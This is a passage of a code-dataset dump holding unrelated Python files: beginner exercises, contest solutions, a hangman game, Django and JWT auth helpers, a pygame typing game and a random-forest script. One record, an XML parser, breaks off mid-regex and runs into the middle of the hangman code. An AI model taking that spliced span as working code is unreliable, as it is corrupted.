(avdusum*0.1)+int_free\n\n#freeint.write(str(int_pr)) \n","sub_path":"ti_one_test.py","file_name":"ti_one_test.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"19272364","text":"names = ['Ali','Yağmur','Hakan','Deniz']\nyears = [1998, 2000, 1998, 1987]\n\n# 1- \"Cenk\" ismini listenin sonuna ekleyiniz.\nnames.append(\"Cenk\")\nprint(\"Names : \", names)\n\n# 2- \"Sena\" değerini listenin başına ekleyiniz.\n\n#names[0] = \"Sena\"\nnames.insert(0,\"Sena\")\nprint(\"Names : \",names)\n\n# 3- \"Deniz\" ismini listeden siliniz.\n\n#names.remove(\"Deniz\")\nnames.pop(3)\nprint(\"Names : \",names)\n\n# 4- \"Deniz\" isminin indeksi nedir ?\n\nnames.insert(3,\"Deniz\")\nprint(\"Names : \",names.index(\"Deniz\"))\n\n# 5- \"Ali\" listenin bir elemanı mıdır ?\n\nprint(\"Ali\" in names)\n\n# 6- Liste elemanlarını ters çevirin.\nnames.reverse()\nprint(names)\n\n# 7- Liste elemanlarını alfabetik olarak sıralayınız.\n\nnames.sort()\nprint(names)\n\n# 8- years listesini rakamsal büyüklüğe göre sıralayınız.\n\nyears.sort()\nprint(years)\n\n# 9- str = \"Chevrolet,Dacia\" karakter dizisini listeye çeviriniz.\nstr = \"Chevrolet,Dacia\"\nanotherStr = str.split(\",\")\nprint(anotherStr)\n\n# 10- years dizisinin en büyük ve en küçük elemanı nedir ?\n\nmin,max = min(years),max(years)\nprint(\"Min : \",min,\"Max : \",max)\n\n# 11- years dizisinde kaç tane 1998 değeri vardır ?\n\nprint(years.count(1998))\n\n# 12- years dizisinin tüm elemanlarını siliniz.\n\nyears.clear()\nprint(years)\n\n# 13- Kullanıcıdan alacağınız 3 tane marka bilgisini bir listede saklayınız.\n\nmarks = []\n\nmark1 = input(\"Marka : \")\nmarks.append(mark1)\n\nmark2 = input(\"Marka : \")\nmarks.append(mark2)\n\nmark3 = input(\"Marka : \")\nmarks.append(mark3)\n\n\nprint(marks)\n\n\n\n","sub_path":"ileriPython/list_method_demo.py","file_name":"list_method_demo.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"634956949","text":"inp = open('pancakerevenge.in', 'r')\r\ndef input():\r\n return int(inp.readline())\r\nraw_input = inp.readline\r\n\r\nout = open('pancakerevenge.out', 'w')\r\n\r\nimport re\r\n\r\nT = input()\r\n\r\nfor t in range(1, T + 1):\r\n msg = raw_input().strip()\r\n msg = msg.rstrip('+')\r\n if len(msg) == 0:\r\n out.write(\"Case #\" + str(t) + \": 0\\n\")\r\n #print 0\r\n 
continue\r\n msg = ''.join(k * 2 for k in msg)\r\n ct = 0\r\n for pt in range(1, len(msg)):\r\n if msg[pt] != msg[pt - 1]:\r\n ct += 1\r\n out.write(\"Case #\" + str(t) + \": \" + str(ct + 1) + \"\\n\")\r\n #print ct + 1\r\n\r\nout.close()\r\n","sub_path":"codes/CodeJamCrawler/16_0_2/blockingthesky/pancakerevenge.py","file_name":"pancakerevenge.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"518913336","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n \nimport xml.sax\n \nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\ndef parse_path(path):\n # 使用minidom解析器打开 XML 文档\n DOMTree = xml.dom.minidom.parse(path)\n root = DOMTree.documentElement\n \n files = root.getElementsByTagName(\"camitem\")\n\n cnt = 0;\n file_list = list()\n for file in files:\n if file.hasAttribute(\"script\"):\n file_list.append(file.getAttribute(\"script\"))\n cnt+=1\n print(cnt)\n return file_list\n\ndef appendAttribute(path):\n import re \n f=open(path,'r', errors='ignore') \n lines=f.readlines() \n f.close() \n f=open(path,'w+', errors='ignore') \n for eachline in lines: \n a=re.sub('= 1 ):\n guessed_letter = raw_input(\"\\nYou've guessed that letter before, try another one: \\n\")\n self.update_game(guessed_letter)\n self.draw_board(word)\n print('Game Over! Winner is....' + self.is_game_over()[1])\n print(\"The secret word was: \" + self.secret_word)\n self.restart()\n\n def update_game(self, letter):\n self.guessed_letters.append(letter)\n if (self.secret_word.count(letter) == 0):\n self.missed_letters.append(letter)\n\n for index in range(len(self.secret_word)):\n secret_letter = self.secret_word[index]\n if (letter == secret_letter):\n self.player_word = self.player_word[0:index] + letter + self.player_word[index+1:]\n \n def restart(self):\n restart = raw_input(\"Would you like to play again? (yes/no) \\n\")\n if (restart != \"yes\"):\n self.should_start = False\n\n# ASCII helpers\n\n def draw_board(self, word):\n board = self.get_current_board(len(self.missed_letters))\n\n missed_letters = \"\"\n for letter in self.missed_letters:\n missed_letters += letter + \" \"\n secret_word = \"Secret word: \" + self.player_word\n\n print(board)\n print(\"Missed Letters: \" + missed_letters)\n print(secret_word)\n\n\n def get_current_board(self, missed_count):\n boards = [\"\"\"\n H A N G M A N\n +---+\n | |\n |\n |\n |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n O |\n |\n |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n O |\n | |\n |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n _O |\n | |\n |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n _O_ |\n | |\n |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n _O_ |\n | |\n / |\n |\n =========\n \"\"\",\n \"\"\"\n H A N G M A N\n +---+\n | |\n _O_ |\n | |\n / \\ |\n |\n =========\n \"\"\"]\n return boards[missed_count]\n# Utility Functions\n\n # Return tuple: (game_over, Winner)\n def is_game_over(self):\n if (len(self.missed_letters) >= 6):\n return (True, \"Player 1\")\n elif (self.player_word == self.secret_word): \n return (True, \"Player 2\")\n else:\n return (False, \"\")\n \n\n# Begin! 
\ngame = HangmanGame()","sub_path":"HangManWordGame/src/Hangman-2.py","file_name":"Hangman-2.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"127191739","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf.urls import url\nfrom django.http.response import JsonResponse, HttpResponseNotFound\nfrom django.utils.html import format_html\nfrom cmsplugin_cascade.models import IconFont\nfrom cmsplugin_cascade.plugin_base import CascadePluginMixinBase\n\n\nclass IconPluginMixin(CascadePluginMixinBase):\n    change_form_template = 'cascade/admin/fonticon_plugin_change_form.html'\n    ring_plugin = 'IconPluginMixin'\n    require_icon_font = True # if False, the icon_font is optional\n\n    class Media:\n        css = {'all': ['cascade/css/admin/iconplugin.css']}\n        js = ['cascade/js/admin/iconpluginmixin.js']\n\n    @classmethod\n    def get_identifier(cls, instance):\n        identifier = super(IconPluginMixin, cls).get_identifier(instance)\n        icon_font = cls.get_icon_font(instance)\n        symbol = instance.glossary.get('symbol')\n        if icon_font and symbol:\n            prefix = icon_font.config_data['css_prefix_text']\n            return format_html('{0}{1}{2}', identifier, prefix, symbol)\n        return identifier\n\n    def changeform_view(self, request, object_id=None, form_url='', extra_context=None):\n        extra_context = dict(extra_context or {}, icon_fonts=IconFont.objects.all())\n        return super(IconPluginMixin, self).changeform_view(\n            request, object_id=object_id, form_url=form_url, extra_context=extra_context)\n\n    def get_form(self, request, obj=None, **kwargs):\n        icon_font_field = [gf for gf in self.glossary_fields if gf.name == 'icon_font'][0]\n        icon_font_field.widget.choices = IconFont.objects.values_list('id', 'identifier')\n        form = super(IconPluginMixin, self).get_form(request, obj=obj, **kwargs)\n        return form\n\n    def get_plugin_urls(self):\n        urlpatterns = [\n            url(r'^fetch_fonticons/(?P<iconfont_id>[0-9]+)$', self.fetch_fonticons),\n            url(r'^fetch_fonticons/$', self.fetch_fonticons, name='fetch_fonticons'),\n        ]\n        urlpatterns.extend(super(IconPluginMixin, self).get_plugin_urls())\n        return urlpatterns\n\n    def fetch_fonticons(self, request, iconfont_id=None):\n        try:\n            icon_font = IconFont.objects.get(id=iconfont_id)\n        except IconFont.DoesNotExist:\n            return HttpResponseNotFound(\"IconFont with id={} does not exist\".format(iconfont_id))\n        else:\n            data = dict(icon_font.config_data)\n            data.pop('glyphs', None)\n            data['families'] = icon_font.get_icon_families()\n            return JsonResponse(data)\n\n    @classmethod\n    def get_icon_font(self, instance):\n        if not hasattr(instance, '_cached_icon_font'):\n            try:\n                instance._cached_icon_font = IconFont.objects.get(id=instance.glossary['icon_font'])\n            except (IconFont.DoesNotExist, KeyError, ValueError):\n                instance._cached_icon_font = None\n        return instance._cached_icon_font\n\n    def render(self, context, instance, placeholder):\n        context['instance'] = instance\n        icon_font = self.get_icon_font(instance)\n        if icon_font:\n            context['stylesheet_url'] = icon_font.get_stylesheet_url()\n        return context\n","sub_path":"cmsplugin_cascade/icon/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"331411339","text":"from common import TreeNode\nfrom typing import List\n\nclass Solution:\n    def delNodes(self, root: TreeNode, to_delete: List[int]) -> List[TreeNode]:\n        forest = []\n        to_delete_set = set(to_delete)\n        \n        if 
root.val not in to_delete_set:\n forest.append(root)\n \n def dfs(node, parent_deleted=False):\n deleted = node.val in to_delete_set\n \n if not deleted and parent_deleted:\n forest.append(node)\n \n for i, child in enumerate([node.left, node.right]):\n if child:\n if dfs(child, deleted):\n if i == 0:\n node.left = None\n else:\n node.right = None\n \n return deleted\n \n dfs(root)\n return forest","sub_path":"LeetCode/p1110.py","file_name":"p1110.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"79907349","text":"\nimport json\nimport jwt\nfrom flask import request\n\nfrom src import app, redis\nfrom src.commons.constant import Msg\nfrom src.commons.date_utils import utc_timestamp\nfrom src.models.user import TbBusiness, TbUser, TbMerchantBusiness\n\n\ndef generate_token(user) -> str:\n\n token = jwt.encode({\"code\": user.code, \"time\": utc_timestamp()}, app.config[\"SECRET_KEY\"]).decode()\n key = \"support_jwt_{}\".format(user.code)\n data = {\n \"exp_time\": utc_timestamp()+24*60*60,\n \"token\": token}\n redis.set(key, value=json.dumps(data), ex=24*60*60)\n return token\n\n\ndef token_verify(token):\n try:\n data = jwt.decode(token, app.config[\"SECRET_KEY\"])\n code = data[\"code\"]\n key = \"support_jwt_{}\".format(code)\n data = json.loads(redis.get(key))\n if not data:\n return \"EXPIRED\"\n elif data.get(\"token\") != token:\n return \"OFFLINE\"\n else:\n user = TbUser.query.filter_by(code=code).first()\n if not user:\n return \"NOT_EXIST\"\n request.token = data\n # 更新 token\n redis.set(\n key,\n value=json.dumps({\n \"exp_time\": utc_timestamp()+24*60*60,\n \"token\": token}),\n ex=24*60*60)\n return user\n except TypeError:\n # 代表没有从 redis 中取得数据\n return \"EXPIRED\"\n except Exception as e:\n app.logger.info(\"obtain data error: {}\".format(str(e)))\n return \"INVALID\"\n\n\ndef permission_required(func):\n def decorator(*args, **kwargs):\n user = request.current_user\n path = request.path.replace(\"/api/v1\", \"\")\n method = request.method.upper()\n roles = user.roles\n # 获取当前用户所有的接口地址\n permission_path = [(i.path, i.method.upper()) for j in roles for i in j.interface]\n if user.is_admin or (path, method) in permission_path:\n return func(*args, **kwargs)\n return Msg.PERMISSION_DENIED, 403\n\n return decorator\n\n\ndef superuser_required(func):\n def decorator(*args, **kwargs):\n user = request.current_user\n if not user.is_admin:\n return Msg.PERMISSION_DENIED, 403\n return func(*args, **kwargs)\n\n return decorator\n\n\ndef appid_required(func):\n \"\"\"\n appid 要求\n :param func:\n :return:\n \"\"\"\n\n def decorator(*args, **kwargs):\n appid = request.headers.get(\"Appid\", None)\n biz = TbBusiness.query.filter_by(appid=appid, status=True).first()\n if appid is None or not biz:\n return Msg.USER_FORBIDDEN, 403\n try:\n user = request.current_user\n # 判断非 root 用户所在商户是否有访问改系统的权限\n if not user.is_admin:\n user_mer_biz = TbMerchantBusiness.query.filter_by(merchant_code=user.merchant.code).all()\n if biz.code not in [i.business_code for i in user_mer_biz]:\n return Msg.USER_FORBIDDEN, 403\n return func(*args, **kwargs)\n except AttributeError as e:\n return func(*args, **kwargs)\n\n return decorator\n\n\ndef token_required(func):\n \"\"\"\n token 要求\n :param func:\n :return:\n \"\"\"\n\n def decorator(*args, **kwargs):\n token = request.headers.get(\"Jwt\", None)\n if token is None:\n return Msg.NO_DATA, 401\n user = token_verify(token)\n if user == \"EXPIRED\":\n return 
Msg.TOKEN_EXPIRATION, 401\n elif user == \"INVALID\":\n return Msg.INVALID_TOKEN, 401\n elif user == \"NOT_EXIST\":\n return Msg.USER_NOT_EXISTS, 401\n elif user == \"OFFLINE\":\n return Msg.USER_OFFLINE, 401\n else:\n if not user.is_admin and not user.merchant:\n return Msg.NO_DATA, 403\n # 判断用户是否登录状态下被禁用\n if not user.active:\n return Msg.USER_IS_BANED, 403\n # 为 request 修改默认 user 属性\n request.current_user = user\n return func(*args, **kwargs)\n\n return decorator\n\n\ndef redis_delete(key):\n try:\n redis.delete(key)\n return True\n except Exception as e:\n return True\n\n\ndef token_appid_permission_required(func):\n\n @token_required\n @appid_required\n @permission_required\n def decorator(*args, **kwargs):\n return func(*args, **kwargs)\n return decorator\n","sub_path":"xxw/support/src/commons/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"368137439","text":"import sys, random, time, pygame\nfrom pygame.locals import *\nimport L3_Setting_bf\nimport time\ndef print_text(font, x, y, text, color=(0,0,0)):\n imgText = font.render(text, True, color)\n screen.blit(imgText, (x,y))\n\npygame.init()\nscreen = pygame.display.set_mode((1000,600))\npygame.display.set_caption(\"typing game\")\nfont1 = pygame.font.Font(None, 100)\nfont2 = pygame.font.Font(None, 180)\nfont3 = pygame.font.Font(None, 90)\nfont4 = pygame.font.Font('simhei.ttf', 22)\n\nwhite = 255,255,255\nkey_flag = False\ncorrect_answer = 97 #\"a\"\nseconds = 31\nscore = 0\nclock_start = 0\ngame_over = True\n\nback = pygame.image.load('lesson3/back.png').convert_alpha()\nback = pygame.transform.smoothscale(back, (1000,600))\ndocNor = pygame.image.load('lesson3/normal.png').convert_alpha()\ndocNor = pygame.transform.smoothscale(docNor, (180,240))\ndocSmill = pygame.image.load('lesson3/smill.png').convert_alpha()\ndocSmill = pygame.transform.smoothscale(docSmill, (180,240))\ndocMad = pygame.image.load('lesson3/wrong.png').convert_alpha()\ndocMad = pygame.transform.smoothscale(docMad, (180,240))\nsetx, sety = L3_Setting_bf.setpos()\ndocFlag = 0 #0是normal,1是smile, 2是mad(wrong)\ncount = 0\n\nwhile True:\n time.sleep(0.01)\n keys = pygame.key.get_pressed()\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == KEYDOWN and event.key != correct_answer and not game_over:\n print(correct_answer)\n docFlag = 2\n\n if keys[K_ESCAPE]:\n pygame.quit()\n sys.exit()\n\n if keys[K_RETURN]:\n if game_over:\n game_over = False\n score = 0\n seconds = 31\n r,g,b = L3_Setting_bf.setcolor()\n\n clock_start = time.clock()\n current = time.clock() - clock_start\n speed = score * 2\n if seconds-current < 0:\n game_over = True\n elif current <= 30:\n if keys[correct_answer] and not game_over:\n correct_answer = random.randint(97,122)\n score += 1\n setx,sety = L3_Setting_bf.setpos()\n docFlag = 1\n r,g,b = L3_Setting_bf.setcolor()\n\n screen.blit(back, (0,0))\n\n\n #切换三个图片\n if docFlag == 0:\n screen.blit(docNor, (670,180))\n r,g,b=L3_Setting_bf.setcolor()\n color=r,g,b\n elif docFlag == 1:\n screen.blit(docSmill, (670,180))\n r,g,b=L3_Setting_bf.setcolor()\n color=r,g,b\n elif docFlag == 2:#如果输入的字母是错误的\n screen.blit(docMad, (670,180))\n r=0\n g=0\n b=0\n color=r,g,b\n #课堂练习3(黑色变成红色)\n\n\n\n\n if docFlag != 0: # 让smill跟wrong图片停留一段时间\n count +=1\n if count == 90:\n count = 0\n docFlag = 0\n\n #显示倒计时\n if game_over:\n # print_text(font1, 0, 160, \"Press Enter to start...\")\n 
print_text(font1, 65, 53, '30')\n if not game_over:\n #字母颜色变化\n if r <= 225 and g <= 225 and b <= 225:\n r += random.randint(15,20)/100\n g += random.randint(15,20)/100\n b += random.randint(15,20)/100\n else:\n r = 205\n g = 205\n b = 155\n color = r,g,b\n\n if int(seconds-current) >=10:\n print_text(font1, 65, 53, str(int(seconds-current)))\n else:\n print_text(font1, 65, 53, ' ' + str(int(seconds-current)),(255,0,0))\n # print_text(font1, 0, 80, \"Time: \" + str(int(seconds-current)))\n\n #显示得分\n if speed < 10:\n speedStr = ' ' + str(speed)\n else:\n speedStr = str(speed)\n print_text(font3, 760, 110, speedStr)\n\n #显示大字母\n print_text(font2, setx, sety, chr(correct_answer-32), color)\n #显示游戏说明\n print_text(font4, 220, 450, ' 游戏规则:按下Enter键开始游戏')\n print_text(font4, 220, 480, ' 在键盘上敲下你看到的字母')\n print_text(font4, 220, 510, ' 看你能够得到多少分')\n\n\n pygame.display.update()\n","sub_path":"example/test/L3_Typing_bf.py","file_name":"L3_Typing_bf.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503222786","text":"from deck import Deck\n\nclass Player(object):\n \"\"\"\n Player has private_card_list which store the cards, name\n \"\"\"\n def __init__(self, playerName):\n self.private_card_list = []\n self.name = playerName\n self.points = 0\n\n def draw(self, deck):\n # Get the first card from the deck stack\n self.private_card_list.append(deck.cards[0])\n deck.removeTopCard()\n\n def calculate(self):\n # Figure out how many points\n points = 0\n numberOfAces = 0\n for card in self.private_card_list:\n temp = card.split()\n if temp[0].isdigit():\n points += int(temp[0])\n elif temp[0] == 'Ace':\n points += 11\n numberOfAces += 1\n else:\n points += 10\n\n while numberOfAces >0 and points > 21:\n numberOfAces -= 1\n points -= 10\n\n return points\n\n\n\n","sub_path":"BlackJack/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"11451165","text":"\"\"\"\nThe module checks if all results are present in the folder, with the correct\ntree structure.\nIf files are missing, it returns 0 and prints the respective paths in which\nthey should be, and their characteristics.\nIf the folder tree structure is complete, the function returns 1 and a message.\n\"\"\"\n\nimport numpy as np\nimport os\n\nprint('warning: the check depends on the file param_dict.npy \\n')\n# TODO: add check if the param_dict is coherent with the results files\n\n\ndef split_all(path):\n \"\"\"\n The function breaks out all of parts of a file or directory path\n \"\"\"\n all_parts = []\n while 1:\n parts = os.path.split(path)\n # absolute path case\n if parts[0] == path:\n all_parts.insert(0, parts[0])\n break\n # relative path case\n elif parts[1] == path:\n all_parts.insert(0, parts[1])\n break\n else:\n path = parts[0]\n all_parts.insert(0, parts[1])\n return all_parts\n\n\ndef check_tree_folder_structure(path):\n \"\"\"\n The function checks if the tree folder structure of 'results' contains\n all the files required by the analysis, and returns the specifics of the\n missing files, if any.\n\n Parameters:\n path : str.\n path of the results folder\n \"\"\"\n # load parameter dictionary\n param_dict = np.load('param_dict.npy').item()\n sessions = ['i140703-001', 'l101210-001']\n # set of all combination of epochs and trial types\n epochs = set(param_dict[str(sessions[0])].keys())\n # constructing set and list 
with all job numbers\n set_fim_folders = set()\n list_fim_folders = []\n flag_annotations = 1\n flag_filtered_res = 1\n flag_fim_folders = 1\n flag_patt_time_hist = 1\n flag_complete = 1\n for key1, value1 in param_dict.items():\n for key2, value2 in value1.items():\n jobs_within_epoch = []\n for key3, value3 in value2.items():\n jobs_within_epoch.append(str(key3))\n list_fim_folders.append(str(key3))\n set_fim_folders.add(tuple(jobs_within_epoch))\n # walking the tree folder structure\n for dirName, subdirList, fileList in os.walk(path):\n # check if the session level is complete\n if subdirList == sessions:\n if not os.path.exists(dirName + 'patt_time_hist.npy'):\n print('patt_time_hist.npy file missing in %s: \\n' %dirName)\n flag_patt_time_hist = 0\n # check if the epochs folder is complete\n if os.path.basename(dirName) in epochs:\n if not os.path.exists(dirName + '/annotations.npy'):\n print('annotations.npy file missing in: %s \\n' % dirName)\n flag_annotations = 0\n if not os.path.exists(dirName + '/filtered_res.npy'):\n print('filtered_res.npy file missing in: %s \\n' % dirName)\n flag_filtered_res = 0\n # check if the job number level is complete\n if os.path.basename(dirName) in list_fim_folders:\n if not os.path.exists(dirName + '/results.npy'):\n print('results.npy file missing in: %s' % dirName)\n # refer the parameters of the missing job through the\n # param_dict file\n print('the missing results characteristics are:')\n split_path = split_all(dirName)\n missing_file = param_dict[split_path[-3]][\n split_path[-2]][int(split_path[-1])]\n print(missing_file, '\\n')\n flag_fim_folders = 0\n flag = flag_complete * flag_annotations * flag_filtered_res * \\\n flag_complete * flag_fim_folders * flag_patt_time_hist\n if flag:\n print('folder tree structure is complete')\n return 1\n else:\n return 0\n\n\n# path of the results folder\npath = '../results/'\n\n# call of the function\ncheck_tree_folder_structure(path=path)\n","sub_path":"r2g_data/code/check_tree_folder_structure.py","file_name":"check_tree_folder_structure.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"193660715","text":"from setuptools import setup\n\n\ndef readme_file_contents():\n\twith open('README.rst') as readme_file:\n\t\tdata = readme_file.read()\n\treturn data\n\n\nsetup(\n\tname=\"ivchepot\",\n\tversion=\"1.0.0\",\n\tdescription=\"Simple TCP Honeypot\",\n\tlong_description=readme_file_contents(),\n\tauthor=\"Ivche1337\",\n\tauthor_email=\"ivchepro@gmail.com\",\n\tlicence=\"MIT\",\n\tpackages=[\"ivchepot\"],\n\tzip_safe=False,\n\tinstall_requires=[]\n)\n","sub_path":"pypi_install_script/ivchepot-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"445104055","text":"#方法就是先排序,然后利用头尾指针找到两个数使得他们的和等于target,\ndef threeSum(nums):\n answer = []\n nums.sort()\n for a in range(len(nums)):\n if nums[a] > 0:\n break\n b = a + 1\n c = len(nums) - 1\n while b < c:\n if nums[b] + nums[c] > -nums[a]:\n c -= 1\n continue\n if nums[b] + nums[c] == -nums[a]:\n if [nums[a], nums[b], nums[c]] not in answer:\n answer.append([nums[a], nums[b], nums[c]])\n b += 1\n continue\n else:\n b += 1\n continue\n return answer\n\n\nif __name__ == '__main__':\n list = [-2, 0, 1, 1, 2]\n 
print(threeSum(list))\n","sub_path":"LeetCode/0015/best.py","file_name":"best.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"151586990","text":"import pandas as pd\nfrom random import seed\nfrom random import randrange\n\ndata = pd.read_csv(\"train.csv\").head(5000)\nprint(data.shape)\ndata = data.fillna(-1)\n\"\"\"\nDate,Location,MinTemp,MaxTemp,Rainfall,Evaporation,Sunshine,WindGustDir,WindGustSpeed,\nWindDir9am,WindDir3pm,WindSpeed9am,WindSpeed3pm,Humidity9am,Humidity3pm,Pressure9am,\nPressure3pm,Cloud9am,Cloud3pm,Temp9am,Temp3pm,RainToday,RainTomorrow\n\"\"\"\n\ndata.drop(labels=['Date', 'Location', 'WindDir9am', 'WindSpeed3pm', 'WindGustDir',], axis=1, inplace=True)\ndata.drop(labels=['WindDir3pm'], axis=1, inplace=True)\n\nprint(data.shape)\n\ndata.RainTomorrow = data.RainTomorrow.map({'No': 0, 'Yes': 1})\ndata.RainToday = data.RainToday.map({'No': 0, 'Yes': 1, 'nan': -1})\n\ndataSet = []\nfor x, y in data.iterrows():\n    dataSet.append(y.values.tolist())\n\n\n# 除了标签列,其他列都转换为float类型\ndef column_to_float(dataSet):\n    featLen = len(dataSet[0]) - 1\n    for data in dataSet:\n        for column in range(featLen):\n            data[column] = float(data[column])\n\n\n# 将数据集随机分成N块,方便交叉验证,其中一块是测试集,其他四块是训练集\ndef spiltDataSet(dataSet, n_folds):\n    fold_size = int(len(dataSet) / n_folds)\n    dataSet_copy = list(dataSet)\n    dataSet_spilt = []\n    for i in range(n_folds):\n        fold = []\n        while len(fold) < fold_size:  # 这里不能用if,if只是在第一次判断时起作用,while执行循环,直到条件不成立\n            index = randrange(len(dataSet_copy))\n            fold.append(dataSet_copy.pop(index))  # pop() 函数用于移除列表中的一个元素(默认最后一个元素),并且返回该元素的值。\n        dataSet_spilt.append(fold)\n    return dataSet_spilt\n\n\n# 构造数据子集\ndef get_subsample(dataSet, ratio):\n    subdataSet = []\n    lenSubdata = round(len(dataSet) * ratio)  # 返回浮点数\n    while len(subdataSet) < lenSubdata:\n        index = randrange(len(dataSet) - 1)\n        subdataSet.append(dataSet[index])\n    return subdataSet\n\n\n# 分割数据集\ndef data_spilt(dataSet, index, value):\n    left = []\n    right = []\n    for row in dataSet:\n        if row[index] < value:\n            left.append(row)\n        else:\n            right.append(row)\n    return left, right\n\n\n# 计算分割代价\ndef spilt_loss(left, right, class_values):\n    loss = 0.0\n    for class_value in class_values:\n        left_size = len(left)\n        if left_size != 0:  # 防止除数为零\n            prop = [row[-1] for row in left].count(class_value) / float(left_size)\n            loss += (prop * (1.0 - prop))\n        right_size = len(right)\n        if right_size != 0:\n            prop = [row[-1] for row in right].count(class_value) / float(right_size)\n            loss += (prop * (1.0 - prop))\n    return loss\n\n\n# 选取任意的n个特征,在这n个特征中,选取分割时的最优特征\ndef get_best_spilt(dataSet, n_features):\n    features = []\n    class_values = list(set(row[-1] for row in dataSet))\n    b_index, b_value, b_loss, b_left, b_right = 999, 999, 999, None, None\n    while len(features) < n_features:\n        index = randrange(len(dataSet[0]) - 1)\n        if index not in features:\n            features.append(index)\n    for index in features:  # 找到列的最适合做节点的索引,(损失最小)\n        for row in dataSet:\n            left, right = data_spilt(dataSet, index, row[index])  # 以它为节点的,左右分支\n            loss = spilt_loss(left, right, class_values)\n            if loss < b_loss:  # 寻找最小分割代价\n                b_index, b_value, b_loss, b_left, b_right = index, row[index], loss, left, right\n    return {'index': b_index, 'value': b_value, 'left': b_left, 'right': b_right}\n\n\n# 决定输出标签\ndef decide_label(data):\n    output = [row[-1] for row in data]\n    return max(set(output), key=output.count)\n\n\n# 子分割,不断地构建叶节点的过程对对对\ndef sub_spilt(root, n_features, max_depth, min_size, depth):\n    left = 
root['left']\n right = root['right']\n del (root['left'])\n del (root['right'])\n if not left or not right:\n root['left'] = root['right'] = decide_label(left + right)\n return\n if depth > max_depth:\n root['left'] = decide_label(left)\n root['right'] = decide_label(right)\n return\n if len(left) < min_size:\n root['left'] = decide_label(left)\n else:\n root['left'] = get_best_spilt(left, n_features)\n sub_spilt(root['left'], n_features, max_depth, min_size, depth + 1)\n if len(right) < min_size:\n root['right'] = decide_label(right)\n else:\n root['right'] = get_best_spilt(right, n_features)\n sub_spilt(root['right'], n_features, max_depth, min_size, depth + 1)\n\n\n# 构造决策树\ndef build_tree(dataSet, n_features, max_depth, min_size):\n root = get_best_spilt(dataSet, n_features)\n sub_spilt(root, n_features, max_depth, min_size, 1)\n return root\n\n\n# 预测测试集结果\ndef predict(tree, row):\n predictions = []\n if row[tree['index']] < tree['value']:\n if isinstance(tree['left'], dict):\n return predict(tree['left'], row)\n else:\n return tree['left']\n else:\n if isinstance(tree['right'], dict):\n return predict(tree['right'], row)\n else:\n return tree['right']\n # predictions=set(predictions)\n\n\ndef bagging_predict(trees, row):\n predictions = [predict(tree, row) for tree in trees]\n return max(set(predictions), key=predictions.count)\n\n\n# 创建随机森林\ndef random_forest(train, test, ratio, n_feature, max_depth, min_size, n_trees):\n trees = []\n for i in range(n_trees):\n train = get_subsample(train, ratio) # 从切割的数据集中选取子集\n tree = build_tree(train, n_feature, max_depth, min_size)\n trees.append(tree)\n predict_values = [bagging_predict(trees, row) for row in test]\n return predict_values\n\n\n# 计算准确率\ndef accuracy(predict_values, actual):\n correct = 0\n for i in range(len(actual)):\n if actual[i] == predict_values[i]:\n correct += 1\n return correct / float(len(actual))\n\n\ndef AUC(label, pre):\n # 计算正样本和负样本的索引,以便索引出之后的概率值\n pos = [i for i in range(len(label)) if label[i] == 1]\n neg = [i for i in range(len(label)) if label[i] == 0]\n auc = 0\n for i in pos:\n for j in neg:\n if pre[i] > pre[j]:\n auc += 1\n elif pre[i] == pre[j]:\n auc += 0.5\n return auc / (len(pos) * len(neg))\n\n\nif __name__ == '__main__':\n seed(1)\n column_to_float(dataSet) # dataSet\n n_folds = 3\n max_depth = 5\n min_size = 2\n ratio = 1.0\n n_features = 3\n n_trees = 4\n folds = spiltDataSet(dataSet, n_folds) # 先是切割数据集\n scores = []\n for fold in folds:\n train_set = folds[:]\n train_set.remove(fold) # 选好训练集\n train_set = sum(train_set, []) # 将多个fold列表组合成一个train_set列表\n test_set = []\n for row in fold:\n row_copy = list(row)\n row_copy[-1] = None\n test_set.append(row_copy)\n actual = [row[-1] for row in fold]\n predict_values = random_forest(train_set, test_set, ratio, n_features, max_depth, min_size, n_trees)\n accur = AUC(label=actual, pre=predict_values)\n print(\"accur\", accur)\n scores.append(accur)\n\n print('Trees is %d' % n_trees)\n print('AUC:%s' % scores)\n print('mean AUC:%s' % (sum(scores) / 